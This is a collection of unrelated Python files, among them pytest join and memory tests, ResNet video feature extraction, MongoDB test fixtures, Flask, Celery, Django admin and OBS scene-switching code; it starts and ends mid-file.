            {'game_id': 1, 'player_id': 3, 'score': 99}
        ],
        data_right=[
            {'player_id': 1, 'username': 'XeroX', 'score': 400},
            {'player_id': 2, 'username': 'jay', 'score': 451},
            {'player_id': 3, 'username': 'Destroyer', 'score': 999},
        ],
        etalon=[
            {'game_id': 1, 'player_id': 3, 'score_game': 99, 'score_max': 999, 'username': 'Destroyer'},
            {'game_id': 2, 'player_id': 1, 'score_game': 17, 'score_max': 400, 'username': 'XeroX'},
            {'game_id': 3, 'player_id': 1, 'score_game': 22, 'score_max': 400, 'username': 'XeroX'}
        ],
        cmp_keys=("game_id", "player_id", "score", "username"),
        join_data_left_items=(0, 1),
        join_data_right_items=(0,),
        join_etalon_items=(1, 2)
    )
]
@pytest.mark.parametrize("case", JOIN_CASES)
def test_joiner(case: JoinCase) -> None:
    """Check the bare joiner on one key group, then ops.Join end to end."""
    key_func = _Key(*case.cmp_keys)
    left_rows = [copy.deepcopy(case.data_left[i]) for i in case.join_data_left_items]
    right_rows = [copy.deepcopy(case.data_right[i]) for i in case.join_data_right_items]
    expected_rows = [copy.deepcopy(case.etalon[i]) for i in case.join_etalon_items]
    joined = case.joiner(case.join_keys, iter(left_rows), iter(right_rows))
    assert isinstance(joined, tp.Iterator)
    assert sorted(expected_rows, key=key_func) == sorted(joined, key=key_func)
    full_result = ops.Join(case.joiner, case.join_keys)(iter(case.data_left), iter(case.data_right))
    assert isinstance(full_result, tp.Iterator)
    assert sorted(case.etalon, key=key_func) == sorted(full_result, key=key_func)
# ########## HEAVY TESTS WITH MEMORY TRACKING ##########
@pytest.fixture(scope="function")
def baseline_memory() -> tp.Generator[int, None, None]:
    # Measure the process's idle memory footprint (watchdog samples during a
    # short sleep) so heavy tests can assert on *additional* memory only.
    yield _run_watchdog(lambda: time.sleep(0.1), limit=100 * MiB, is_baseline=True)
def _run_watchdog(callback: tp.Callable[[], tp.Any], limit: int, is_baseline: bool) -> int:
    """Run `callback` while a MemoryWatchdog thread samples memory.

    Returns the peak memory usage observed by the watchdog. The watchdog is
    always stopped and joined, even if the callback raises.
    """
    watchdog = memory_watchdog.MemoryWatchdog(limit=limit, is_baseline=is_baseline)
    watchdog.start()
    try:
        callback()
    finally:
        watchdog.stop()
        watchdog.join()
    return watchdog.maximum_memory_usage
def run_and_track_memory(callback: tp.Callable[[], tp.Any], limit: int) -> tp.Any:
    # Execute `callback` under the memory watchdog and fail the test if its
    # peak memory usage exceeded `limit` bytes.
    # NOTE(review): annotated -> tp.Any but implicitly returns None.
    process_memory = _run_watchdog(callback, limit=limit, is_baseline=False)
    assert process_memory <= limit
def get_map_data() -> tp.Generator[tp.Dict[str, tp.Any], None, None]:
    """Yield one million identical rows for the mapper memory tests."""
    # Give the watchdog a moment to sample memory before rows start flowing.
    time.sleep(0.1)
    emitted = 0
    while emitted < 1000000:
        yield {'data': "HE.LLO", 'n': 2}
        emitted += 1
@pytest.mark.parametrize("func_mapper, additional_memory", [
    (ops.DummyMapper(), 1 * MiB),  # Strange memory leap on test start
    (ops.LowerCase(column='data'), 500 * KiB),
    (ops.FilterPunctuation(column='data'), 500 * KiB),
    (ops.Split(column='data', separator='E'), 500 * KiB),
    (ops.Product(columns=['data', 'n'], result_column='prod'), 500 * KiB),
    (ops.Filter(condition=lambda row: row['data'] == "HE.LLO"), 500 * KiB),
    (ops.Project(columns=['data']), 500 * KiB),
])
def test_heavy_map(func_mapper: ops.Mapper, additional_memory: int, baseline_memory: int) -> None:
    # Pull one row through each mapper over a 1M-row stream: mappers must
    # process lazily, exceeding the baseline by at most `additional_memory`.
    time.sleep(1)
    op = ops.Map(func_mapper)(get_map_data())
    run_and_track_memory(lambda: next(op), baseline_memory + additional_memory)
def test_heavy_split(baseline_memory: int) -> None:
    # A single huge row: Split must yield its pieces lazily rather than
    # materializing ~100k result rows at once.
    func_map = ops.Split(column='data', separator='E')
    record = {'data': "E" * 100500, 'n': 2}
    op = func_map(record)
    run_and_track_memory(lambda: next(op), baseline_memory + 500 * KiB)
def get_reduce_data() -> tp.Generator[tp.Dict[str, tp.Any], None, None]:
    """Yield four large key groups (305k rows each) for reducer memory tests."""
    for key in ("a", "b", "c", "ddd"):
        # Let the watchdog sample memory between groups.
        time.sleep(0.1)
        value = 0
        while value < 305000:
            yield {"key": key, "value": value}
            value += 1
@pytest.mark.parametrize("func_reducer, additional_memory", [
    (ops.FirstReducer(), 500 * KiB),
    (ops.TermFrequency(words_column='key'), 500 * KiB),
    (ops.Count(column='key'), 500 * KiB),
    (ops.Sum(column='value'), 500 * KiB),
    (ops.TopN(column='key', n=5000), 2 * MiB),
])
def test_heavy_reduce(func_reducer: ops.Reducer, additional_memory: int, baseline_memory: int) -> None:
    # Reducers may buffer at most one key group, never the whole stream.
    op = ops.Reduce(func_reducer, ("key", ))(get_reduce_data())
    run_and_track_memory(lambda: next(op), int(baseline_memory + additional_memory))
@pytest.mark.parametrize("func_joiner, additional_memory", [
    (ops.InnerJoiner(), 100 * MiB),
    (ops.LeftJoiner(), 100 * MiB),
    (ops.RightJoiner(), 100 * MiB)
])
def test_heavy_join(func_joiner: ops.Joiner, additional_memory: int, baseline_memory: int) -> None:
    # Joins may buffer one key group per side; groups here are ~305k rows,
    # hence the generous 100 MiB allowance.
    op = ops.Join(func_joiner, ("key", ))(get_reduce_data(), get_reduce_data())
    run_and_track_memory(lambda: next(op), baseline_memory + additional_memory)
def get_complexity_join_data() -> tp.Generator[tp.Dict[str, tp.Any], None, None]:
    """Yield 100500 rows with all-distinct keys for the join complexity test."""
    n = 0
    while n < 100500:
        yield {"key": n, "value": n}
        n += 1
@pytest.mark.parametrize("func_joiner", [
    ops.InnerJoiner(),
    ops.LeftJoiner(),
    ops.RightJoiner()
])
def test_complexity_join(func_joiner: ops.Joiner) -> None:
    # Every key is unique, so a quadratic join would be prohibitively slow;
    # completing in reasonable time is the implicit assertion here.
    list(ops.Join(func_joiner, ("key", ))(get_complexity_join_data(), get_complexity_join_data()))
|
def calcualte(num):
    """Print 100/num; print a friendly message instead of crashing on zero."""
    try:
        print(100 / num)
    except ZeroDivisionError:
        print("num value cant be zero")
    finally:
        # Always executed -- the same pattern is useful for closing resources.
        print("Code executes")


calcualte(1)
calcualte(0)
'''
Extract feature vectors from video frames.
These features come from the Pool5 layers of a ResNet deep
neural network, pre-trained on ImageNet. The algorithm captures
frames directly from the video, so there is no need for prior frame extraction.
Copyright (C) 2019 Alexandros I. Metsai
alexmetsai@gmail.com
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 3
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
'''
import h5py
import os
import sys
import torch
from torchvision import transforms, models
import torch.nn as nn
import cv2
from PIL import Image
import numpy as np
class Rescale(object):
    """
    Rescale a PIL image to the given size.

    Args:
        output_size : One or two integers. With two integers (height, width)
            the image is resized to exactly that size. With a single integer
            the smallest of the original dimensions is resized to this value
            and the largest is scaled to keep the same aspect ratio
            (matching the behaviour the original docstring promised, which
            previously crashed on the two-value unpack).
    """

    def __init__(self, *output_size):
        if len(output_size) not in (1, 2):
            raise ValueError("output_size must be one or two integers")
        self.output_size = output_size

    def __call__(self, image):
        """
        Args:
            image (PIL.Image) : PIL.Image object to rescale.

        Returns:
            The resized PIL.Image.
        """
        if len(self.output_size) == 1:
            # Single integer: resize the smallest dimension to this value,
            # preserving the aspect ratio of the other.
            target = int(self.output_size[0])
            w, h = image.size
            if h <= w:
                new_h = target
                new_w = int(round(w * target / h))
            else:
                new_w = target
                new_h = int(round(h * target / w))
        else:
            new_h, new_w = self.output_size
            new_h, new_w = int(new_h), int(new_w)
        # PIL takes (width, height) order.
        return image.resize((new_w, new_h), resample=Image.BILINEAR)
class ResNetPool5(nn.Module):
    """Pretrained ImageNet ResNet truncated to emit Pool5 features.

    Args:
        DNN (string): The DNN architecture. Choose from resnet101,
            resnet50 or resnet152.

    Raises:
        ValueError: if `DNN` is not one of the supported architectures
            (previously this printed an error and called exit(1); library
            code should raise instead of terminating the interpreter).
    """

    def __init__(self, DNN='resnet101'):
        super().__init__()
        if DNN == "resnet101":
            resnet = models.resnet101(pretrained=True)
        elif DNN == "resnet50":
            resnet = models.resnet50(pretrained=True)
        elif DNN == "resnet152":
            resnet = models.resnet152(pretrained=True)
        else:
            raise ValueError("Network " + DNN + " not supported.")
        resnet.float()
        # Use GPU if possible.
        if torch.cuda.is_available():
            resnet.cuda()
        resnet.eval()
        module_list = list(resnet.children())
        # Everything up to (excluding) avgpool + fc gives the conv5 maps.
        self.conv5 = nn.Sequential(*module_list[:-2])
        # The average-pooling layer itself ("pool5").
        self.pool5 = module_list[-2]

    def forward(self, x):
        """Return the flattened Pool5 feature vector as a numpy array.

        NOTE: the output is moved to CPU and converted to numpy, so it is
        not differentiable -- fine for pure feature extraction.
        """
        res5c = self.conv5(x)
        pool5 = self.pool5(res5c)
        pool5 = pool5.view(pool5.size(0), -1)
        pool5 = pool5.cpu().data.numpy().flatten()
        return pool5
# Check torchvision docs about these normalization values applied on ResNet.
# Since it was applied on training data, we should do so as well.
# NOTE(review): transforms.ToTensor scales PIL images to [0, 1] before
# Normalize runs, so the ImageNet mean/std below are applied in the
# expected range -- the original comment's concern appears unfounded,
# but confirm against the torchvision version in use.
data_normalization = transforms.Compose([
    Rescale(224, 224),
    transforms.ToTensor(),
    transforms.Normalize(mean=[0.485, 0.456, 0.406],
                         std=[0.229, 0.224, 0.225])
])
if __name__ == '__main__':
    model = ResNetPool5()
    video_folder = "videos/"

    # Extract features for every .mp4 video in the folder: one HDF5 file per
    # video holding the sequence of per-frame Pool5 feature vectors.
    for video_idx, file in enumerate(os.listdir(video_folder)):
        if not file.endswith(".mp4"):
            # Fixed: the .h5 file used to be created for *every* directory
            # entry before the extension check, leaving empty files behind.
            continue
        print("Processing " + file)
        video_capture = cv2.VideoCapture(video_folder + file)
        success, image = video_capture.read()
        if not success:
            print("Error while reading video file.")
            sys.exit(-1)

        features_list = []  # one feature vector per frame
        i = 1
        while success:
            # cv2 yields numpy arrays; the PyTorch transforms expect PIL.
            image = Image.fromarray(image)
            # Transform the data to ResNet's desired characteristics.
            image = data_normalization(image)
            # Add the extra "batch" dimension.
            image = image.unsqueeze(0)
            # Move the data to GPU (if available) and do a forward pass.
            if torch.cuda.is_available():
                pool5 = model.forward(image.cuda())
            else:
                pool5 = model.forward(image)
            # forward() already returns a CPU numpy vector, so no further
            # detaching/moving is needed (the old temp.cpu() call would have
            # failed on a numpy array anyway).
            features_list.append(pool5)
            # Capture the next frame.
            success, image = video_capture.read()
            i += 1
        print(i)

        # Removed dead code: `video_feat` was reset to None on every frame,
        # so the np.vstack branch could never run; features_list already
        # holds the full per-frame sequence.
        save_path = file + ".h5"
        with h5py.File(save_path, 'w') as h5_file:
            group = h5_file.create_group('video_{}'.format(video_idx + 1))
            group['features'] = features_list
# type(features_list)
# adict=dict(video1=features_list)
# for k,v in adict.items():
# f.create_dataset(k,data=v)
# f.create_dataset('video1' + '/features', data=features_list)
# TODO:
# Need to add option to save the features on a single pickle
# file instead of a separate for each video.
# ### To form your own dataset.. for video summ.. https://github.com/KaiyangZhou/vsumm-reinforce/issues/1
# import h5py
# h5_file_name = 'vsumm_dataset.h5'
# f = h5py.File(h5_file_name, 'w')
# # video_names is a list of strings containing the
# # name of a video, e.g. 'video_1', 'video_2'
# for name in video_names:
# f.create_dataset(name + '/features', data=data_of_name)
# f.create_dataset(name + '/gtscore', data=data_of_name)
# f.create_dataset(name + '/user_summary', data=data_of_name)
# f.create_dataset(name + '/change_points', data=data_of_name)
# f.create_dataset(name + '/n_frame_per_seg', data=data_of_name)
# f.create_dataset(name + '/n_frames', data=data_of_name)
# f.create_dataset(name + '/picks', data=data_of_name)
# f.create_dataset(name + '/n_steps', data=data_of_name)
# f.create_dataset(name + '/gtsummary', data=data_of_name)
# f.create_dataset(name + '/video_name', data=data_of_name)
# f.close() |
from os import environ
import os
import json
import datetime
from configparser import ConfigParser
from kb_Metrics.metricsdb_controller import MetricsMongoDBController
from bson.objectid import ObjectId
from pymongo import MongoClient
# Toggle verbose timestamped logging for these tests.
DEBUG = False


def print_debug(msg):
    """Print `msg` prefixed with the current time, but only when DEBUG is on."""
    if DEBUG:
        t = str(datetime.datetime.now())
        print("{}:{}".format(t, msg))
def setupModule():
    """Read deploy/test configuration, then start and populate the test DB."""
    print_debug ('MODULE - setup')
    token = environ.get('KB_AUTH_TOKEN', None)
    # Deploy Config
    config_file = environ.get('KB_DEPLOYMENT_CONFIG', None)
    cfg = {}
    config = ConfigParser()
    config.read(config_file)
    for nameval in config.items('kb_Metrics'):
        cfg[nameval[0]] = nameval[1]
    # Test Config: the file has no section header, so prepend one to make it
    # parseable by ConfigParser.
    test_cfg_file = '/kb/module/work/test.cfg'
    test_cfg_text = "[test]\n"
    with open(test_cfg_file, "r") as f:
        test_cfg_text += f.read()
    config = ConfigParser()
    config.read_string(test_cfg_text)
    test_cfg_dict = dict(config.items("test"))
    test_cfg = test_cfg_dict
    # NOTE(review): token, cfg and test_cfg are built but never used or
    # exported from this function -- presumably leftovers; confirm before
    # removing.
    # Start and populate the test database.
    init_mongodb()
def teardownModule():
    """Drop the admin users and test databases, then stop mongod."""
    print_debug('MODULE - teardown')
    client = MongoClient(port=27017)
    for db_name in ['workspace', 'exec_engine', 'userjobstate', 'auth2', 'metrics']:
        try:
            client[db_name].command("dropUser", "admin")
            client.drop_database(db_name)
        except Exception as ex:
            print('ERROR dropping db: ' + str(ex))
    try:
        os.system("sudo service mongodb stop")
    except Exception as ex:
        print('ERROR stopping db: ' + str(ex))
def init_mongodb():
    """Start local mongod, load the JSON fixtures, and normalize date fields.

    Fixture files store timestamps as epoch-millisecond strings; each loop
    below converts them to datetime objects so queries behave like prod.
    Finally an 'admin' user is created on every database.
    """
    print_debug("MONGO - starting")
    client = MongoClient(port=27017)
    print_debug('starting to build local mongoDB')
    os.system("sudo service mongodb start")
    os.system("mongod --version")
    # Wait for/confirm mongod readiness by grepping its log.
    os.system("cat /var/log/mongodb/mongodb.log "
              "| grep 'waiting for connections on port 27017'")
    print_debug("MONGO - ready")
    insert_data(client, 'workspace', 'workspaces')
    insert_data(client, 'exec_engine', 'exec_tasks')
    insert_data(client, 'userjobstate', 'jobstate')
    insert_data(client, 'workspace', 'workspaceObjects')
    insert_data(client, 'auth2', 'users')
    insert_data(client, 'metrics', 'users')
    insert_data(client, 'metrics', 'daily_activities')
    insert_data(client, 'metrics', 'narratives')
    db_names = client.database_names()  # NOTE(review): unused here; reassigned below
    # Convert jobstate.created/updated epoch-ms strings to datetimes.
    for jrecord in client.userjobstate.jobstate.find():
        created_str = jrecord.get('created')
        updated_str = jrecord.get('updated')
        client.userjobstate.jobstate.update_many(
            {"created": created_str},
            {"$set": {"created": datetime.datetime.utcfromtimestamp(
                int(created_str) / 1000.0),
                "updated": datetime.datetime.utcfromtimestamp(
                int(updated_str) / 1000.0)}
             }
        )
    # Convert workspaceObjects.moddate (skip records already converted).
    db_coll1 = client.workspace.workspaceObjects
    for wrecord in db_coll1.find():
        moddate_str = wrecord.get('moddate')
        if type(moddate_str) not in [datetime.date, datetime.datetime]:
            moddate = datetime.datetime.utcfromtimestamp(
                int(moddate_str) / 1000.0)
            db_coll1.update_many(
                {"moddate": moddate_str},
                {"$set": {"moddate": moddate}},
                upsert=False
            )
    # Convert workspaces.moddate.
    db_coll2 = client.workspace.workspaces
    for wrecord in db_coll2.find():
        moddate_str = wrecord.get('moddate')
        if type(moddate_str) not in [datetime.date, datetime.datetime]:
            moddate = datetime.datetime.utcfromtimestamp(
                int(moddate_str) / 1000.0)
            db_coll2.update_many(
                {"moddate": moddate_str},
                {"$set": {"moddate": moddate}},
                upsert=False
            )
    # Convert metrics.users signup/last-signin timestamps.
    db_coll3 = client.metrics.users
    for urecord in db_coll3.find():
        signup_at_str = urecord.get('signup_at')
        last_signin_at_str = urecord.get('last_signin_at')
        if type(signup_at_str) not in [datetime.date, datetime.datetime]:
            signup_date = datetime.datetime.utcfromtimestamp(
                int(signup_at_str) / 1000.0)
            signin_date = datetime.datetime.utcfromtimestamp(
                int(last_signin_at_str) / 1000.0)
            db_coll3.update_many(
                {"signup_at": signup_at_str,
                 "last_signin_at": last_signin_at_str},
                {"$set": {"signup_at": signup_date,
                          "last_signin_at": signin_date}},
                upsert=False
            )
    # Convert metrics.narratives first-access/last-saved timestamps.
    db_coll4 = client.metrics.narratives
    for urecord in db_coll4.find():
        first_acc_str = urecord.get('first_access')
        last_saved_at_str = urecord.get('last_saved_at')
        if type(first_acc_str) not in [datetime.date, datetime.datetime]:
            first_acc_date = datetime.datetime.utcfromtimestamp(
                int(first_acc_str) / 1000.0)
            last_saved_date = datetime.datetime.utcfromtimestamp(
                int(last_saved_at_str) / 1000.0)
            db_coll4.update_many(
                {"first_access": first_acc_str,
                 "last_saved_at": last_saved_at_str},
                {"$set": {"first_access": first_acc_date,
                          "last_saved_at": last_saved_date}},
                upsert=False
            )
    # Convert auth2.users create/login timestamps.
    db_coll_au = client.auth2.users
    for urecord in db_coll_au.find():
        create_str = urecord.get('create')
        login_str = urecord.get('login')
        if type(create_str) not in [datetime.date, datetime.datetime]:
            db_coll_au.update_many(
                {"create": create_str, "login": login_str},
                {"$set": {"create": datetime.datetime.utcfromtimestamp(
                    int(create_str) / 1000.0),
                    "login": datetime.datetime.utcfromtimestamp(
                    int(login_str) / 1000.0)}},
                upsert=False
            )
    # Create the readWrite 'admin' user on every database except 'local'.
    db_names = client.database_names()
    for db in db_names:
        if db != 'local':
            client[db].command("createUser", "admin",
                               pwd="password", roles=["readWrite"])
def insert_data(client, db_name, table):
    """(Re)populate `db_name`.`table` from its JSON fixture file.

    Args:
        client: a pymongo MongoClient.
        db_name: target database name.
        table: target collection name; also selects the fixture file
            db_files/ci_<db_name>.<table>.json.
    """
    db = client[db_name]
    record_file = os.path.join('db_files',
                               f'ci_{db_name}.{table}.json')
    # Use a context manager so the fixture file handle is closed promptly
    # (the original bare open().read() relied on the garbage collector).
    with open(record_file) as infile:
        records = json.load(infile)
    if table == 'jobstate':
        # jobstate fixtures store _id as hex strings; restore real ObjectIds.
        for record in records:
            record['_id'] = ObjectId(record['_id'])
    db[table].drop()
    db[table].insert_many(records)
    print_debug(f'Inserted {len(records)} records for {db_name}.{table}')
import sys
sys.stdin = open('input.txt')
# The four orthogonal moves on the grid.
DIRS = ((-1, 0), (1, 0), (0, -1), (0, 1))


def dfs(r, c, number):
    """Extend `number` with digits reachable from (r, c); record 7-digit strings.

    Uses module globals `graph` (4x4 digit grid) and `result` (set of found
    strings). Cells may be revisited.
    """
    if len(number) == 7:
        result.add(number)
        return
    for nr, nc in ((r + dr, c + dc) for dr, dc in DIRS):
        if 0 <= nr < 4 and 0 <= nc < 4:
            dfs(nr, nc, number + graph[nr][nc])
# For each test case: read a 4x4 digit grid and count the distinct 7-digit
# strings produced by 7-step walks (4-neighbour moves, revisits allowed).
for t in range(1, int(input())+1):
    graph = [input().split() for _ in range(4)]
    result = set()
    for r in range(4):
        for c in range(4):
            dfs(r, c, graph[r][c])
    print(f'#{t} {len(result)}')
|
from scrapy.item import Item, Field
class Company(Item):
    """Scrapy item: a crawled company profile."""
    name = Field()
    logo = Field()
    short_description = Field()
    long_description = Field()
    founded_date = Field()
    category = Field()
    # contact details
    website = Field()
    blog = Field()
    twitter = Field()
    phone = Field()
    email = Field()
    # mongo item requirement: unique key identifying the document
    key = Field()
class Office(Item):
    """Scrapy item: a company office location."""
    name = Field()
    address = Field()
    key = Field()
    company_key = Field()  # key of the Company this office belongs to
class Person(Item):
    """Scrapy item: a person affiliated with a company."""
    name = Field()
    title = Field()
    long_description = Field()
    presence = Field()
    key = Field()
    company_key = Field()  # key of the Company this person belongs to
|
from flask import Flask, jsonify, request,abort, make_response
from upcoming_fights import upcoming_fights as u
import json
app = Flask(__name__)

# Placeholder event identifiers (currently unused).
events = ['one','two','three']

# Pre-load the historical winners data once at import time.
with open('Data/winners.json') as json_data:
    d = json.load(json_data)
@app.route('/')
def index():
    """Health-check endpoint."""
    return "STILL HERE!"
# Fixed: the URL converter was named <int:task_id> while the view argument
# is fight_id, which makes Flask raise a TypeError on every request.
@app.route('/api/v1.0/getprediction/<int:fight_id>', methods=['GET'])
def get_fight_by_id(fight_id):
    """Return the upcoming fight with the given id as JSON, or 404."""
    fight = [fight for fight in u if fight['id'] == fight_id]
    if not fight:
        abort(404)
    return jsonify({'fight': fight[0]})
@app.route('/api/v1.0/getprediction/<title>', methods=['GET'])
def get_fight_by_title(title):
    """Return the upcoming fight with the given title as JSON, or 404."""
    matching = [fight for fight in u if fight['title'] == title]
    if not matching:
        abort(404)
    return jsonify({'fight': matching[0]})
@app.errorhandler(404)
def not_found(error):
    """Return a JSON 404 body instead of Flask's default HTML page."""
    payload = jsonify({'STATUS': 'NOT OK', 'reason': '404'})
    return make_response(payload, 404)
if __name__ == '__main__':
    # Development server only; debug=True must not be used in production.
    app.run(debug=True)
|
# -*- coding:utf-8 -*-
# @Time: 6/5/20 11:49 AM
# @Author:bayhax
# absolute_import keeps local module names from clashing with installed libraries
from __future__ import absolute_import, unicode_literals
import os
from celery import Celery, platforms
from django.apps import apps
from django.conf import settings
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'UGC.settings')
# Broker alternatives kept for reference:
# redis as the queue middleware:
# app = Celery('server_manage', backend='redis', broker='redis://localhost')
# rabbitmq as the message queue:
# app = Celery('server_manage', broker='amqp://guest:guest@localhost')
app = Celery('UGC')
app.config_from_object(settings)
# app.config_from_object('django.conf:settings', namespace='CELERY')
# Discover tasks.py modules in every installed Django app.
app.autodiscover_tasks(lambda: [n.name for n in apps.get_app_configs()])
# Allow running the celery worker as root.
platforms.C_FORCE_ROOT = True
# Recycle worker children to guard against memory leaks.
# NOTE(review): assigning this as a plain module variable *after*
# config_from_object likely has no effect on the Celery app's
# configuration -- confirm and move into settings if intended.
CELERYD_MAX_TASKS_PER_CHILD = 10
@app.task(bind=True)
def debug_task(self):
    # Diagnostic task: dumps its own request information.
    print('Request: {0!r}'.format(self.request))
|
#!/usr/bin/env python
import time
import rospy

# Bring the ROS node up first; importing the SDK below starts positioning.
print "[Robotics Indoor SDK] initializing ROS node.."
rospy.init_node('positioning', anonymous=True)
print "[Robotics Indoor SDK] ROS node started, initializing positioning system.."
# Importing the platform-specific SDK module has the side effect of
# starting the positioning system (x86 variant kept for reference).
#import lib.x86.robotics_indoor_sdk
import lib.armv7l.robotics_indoor_sdk

# Keep the process alive while the SDK's background threads run.
while True:
    time.sleep(0.2)
|
import matplotlib.pyplot as plt
import numpy as np

# 100 random points with random colours and sizes.
x = np.random.randint(100, size=(100))
y = np.random.randint(100, size=(100))
colors = np.random.randint(100, size=(100))
sizes = 10 * np.random.randint(100, size=(100))
# Semi-transparent markers so overlaps stay visible; colour bar shows scale.
plt.scatter(x, y, c=colors, s=sizes, alpha=0.5, cmap='nipy_spectral')
plt.colorbar()
plt.show()
|
import os, sys
from iotbx import pdb
def run(filename, verbose=True):
    # Read a PDB file and dump its hierarchy two ways (Python 2 script):
    # pass 1 walks model -> chain -> residue_group -> atom_group;
    # pass 2 walks model -> chain -> conformer -> residue;
    # then a flat sweep over all atom groups / atoms.
    print "run",filename
    pdb_inp = pdb.input(filename)
    hierarchy = pdb_inp.construct_hierarchy()
    for model in hierarchy.models():
        if verbose: print 'model: "%s"' % model.id
        for chain in model.chains():
            if verbose: print 'chain: "%s"' % chain.id
            for residue_group in chain.residue_groups():
                if verbose: print ' residue_group: resseq="%s" icode="%s"' % (
                    residue_group.resseq, residue_group.icode)
                for atom_group_i, atom_group in enumerate(residue_group.atom_groups()):
                    if verbose: print ' atom_group: altloc="%s" resname="%s"' % (
                        atom_group.altloc, atom_group.resname)
    for model in hierarchy.models():
        if verbose: print 'model: "%s"' % model.id
        for chain in model.chains():
            if verbose: print 'chain: "%s"' % chain.id
            for conformer in chain.conformers():
                # NOTE(review): dir() dump looks like leftover debugging.
                print dir(conformer)
                if verbose: print ' conformer: altloc="%s"' % (
                    conformer.altloc)
                for residue in conformer.residues():
                    if verbose: print ' residue: resname="%s"' % (
                        residue.resname)
    for atom_group in hierarchy.atom_groups():
        print atom_group.resname
        for atom in atom_group.atoms():
            print atom.id_str(), atom.quote()
    # Renumber atom serials consecutively.
    hierarchy.atoms().reset_serial()
if __name__=="__main__":
    # Take file names from the command line, then clear argv so downstream
    # libraries do not try to re-parse the arguments.
    args = sys.argv[1:]
    del sys.argv[1:]
    run(*tuple(args))
|
from django.contrib import admin
from .models import Category, Task, Author, Book
from django.utils import timezone
from django.utils.translation import ngettext
from django.contrib import messages
# Register your models here.
@admin.action(description="in this action we want update due_at field")
def update_due_at(modeladmin, request, queryset):
    # Bulk admin action: stamp every selected task's due_at with "now".
    queryset.update(due_at=timezone.now())
# ##### method 2 ######
@admin.register(Task)
class TaskAdmin(admin.ModelAdmin):
    """Admin configuration for Task with inline-editable list rows."""
    readonly_fields = ('id', 'created_at')
    # Editable directly in the changelist; requires these columns in
    # list_display and no display links (hence list_display_links = None).
    list_editable = ('name', 'due_at', )
    list_display_links = None
    fieldsets = (
        ('identification', {'fields': ('id', 'name')}),
        ('time_section', {'fields': ('created_at', 'due_at')}),
        ('category_section', {'fields': ('cat',)})
    )
    # fields = (('id', 'created_at'), 'description')
    # exclude = ('description',)
    list_display = ('name', 'due_at' )
    list_filter = ('cat__name', 'due_at')
    date_hierarchy = 'due_at'
    actions_on_top = True
    actions_selection_counter = True
    actions = ['update_due_at']

    @admin.action(description="in this action we want update due_at field")
    def update_due_at(self, request, queryset):
        # Bulk-update due_at and report how many rows changed, with a
        # singular/plural message via ngettext.
        # NOTE(review): level=messages.ERROR shows the success message in
        # error styling -- confirm whether messages.SUCCESS was intended.
        update_number = queryset.update(due_at=timezone.now())
        self.message_user(request=request,
                          message=ngettext("{} task updated ".format(update_number),
                                           "{} tasks updated ".format(update_number),
                                           update_number),
                          level=messages.ERROR)
class TaskInline(admin.StackedInline):
    # Inline Task editor (used on the Category page); shows 3 blank extras.
    fields = ('name', 'due_at')
    model = Task
    extra = 3
@admin.register(Category)
class CategoryAdmin(admin.ModelAdmin):
    """Admin configuration for Category, with its Tasks editable inline."""
    #
    # def get_form(self, request, obj=None, **kwargs):
    #     form = super().get_form(request, obj, **kwargs)
    #     form.base_fields['name'].initial = 'cat_default_name'
    #     return form
    inlines = [TaskInline]
# admin.site.register(Task)
# admin.site.register(Category)
##### method 1 #####
# class TaskAdmin(admin.ModelAdmin):
# pass
# admin.site.register(Task, TaskAdmin)
class BookAdmin(admin.ModelAdmin):
    # NOTE(review): dead code -- this class is never registered and is
    # shadowed by the decorated BookAdmin defined below; confirm and remove.
    pass
###############################
#
@admin.register(Book)
class BookAdmin(admin.ModelAdmin):
    # Render the many-to-many `authors` field as a vertical dual list box.
    filter_vertical = ('authors', )
#
#
#
# @admin.register(Author)
# class AuthorAdmin(admin.ModelAdmin):
# pass |
from os import listdir
from os.path import isfile, join, dirname, realpath
import time
import json
from functools import partial
import logging
import click
from obswebsocket import obsws, requests
import numpy
import cv2
from mss import mss
logging.basicConfig(level=logging.ERROR)

# obs-websocket connection settings.
host = "localhost"
port = 4444

VALID_RESOLUTIONS_ERROR_MESSAGE = "The only valid resolutions are currently 1080p, 1440p and 1200p. Your resolution is being detected as {resolution}."
# (height, width) pairs for which masks/templates are shipped.
VALID_RESOLUTIONS = [
    (1080, 1920),
    (1440, 2560),
    (1200, 1920)
]

# Flush every print immediately so output is visible when piped.
print = partial(print, flush=True)

# Tracks which OBS scene we believe is active between ticks.
currently_in_default_scene = False
def execute_tick(screen_capture, monitor_to_capture, image_mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, obs, default_scene_name, target_scene_name, show_debug_window):
    """Grab one frame, look for the target image, and switch OBS scenes.

    Returns (tick_time, num_matches). tick_time is None when no scene switch
    happened this tick; on any error (None, -1) is returned so the caller's
    loop keeps running (best-effort behaviour).
    """
    global currently_in_default_scene
    try:
        start_time = time.time()
        frame = numpy.array(screen_capture.grab(screen_capture.monitors[monitor_to_capture]))
        # Only the masked region of the screen matters for matching.
        masked_frame = cv2.bitwise_and(frame, frame, mask=image_mask)
        image_is_in_frame, matches = frame_contains_one_or_more_matching_images(masked_frame, image_mask, image_descriptors, feature_detector, feature_matcher, num_good_matches_required, show_debug_window)
        tick_time = None
        if image_is_in_frame:
            # Switch to the target scene only on a state transition.
            if currently_in_default_scene:
                obs.call(requests.SetCurrentScene(target_scene_name))
                tick_time = round(time.time() - start_time, 2)
                currently_in_default_scene = False
        elif not currently_in_default_scene:
            assumed_render_delay_sec = 0.1
            # Compensates for the render delay, otherwise the scene changes too fast
            time.sleep(assumed_render_delay_sec)
            obs.call(requests.SetCurrentScene(default_scene_name))
            tick_time = round((time.time() - start_time) - assumed_render_delay_sec, 2)
            currently_in_default_scene = True
        return (tick_time, matches)
    except Exception as e:
        # Deliberate catch-all: log and keep ticking rather than crash.
        print(e)
        return (None, -1)
def get_valid_camera_indices():
    """Return the camera indices in [0, 10] from which OpenCV can grab a frame.

    Note: despite the original comment saying "first 10 indexes", indices
    0 through 10 inclusive (11 devices) are probed, preserving the original
    behaviour.
    """
    valid_indices = []
    for index in range(11):
        cap = cv2.VideoCapture(index)
        ret, _frame = cap.read()
        if ret:
            valid_indices.append(index)
        cap.release()
    # Removed the pointless `indices_cache = arr` alias: the local was never
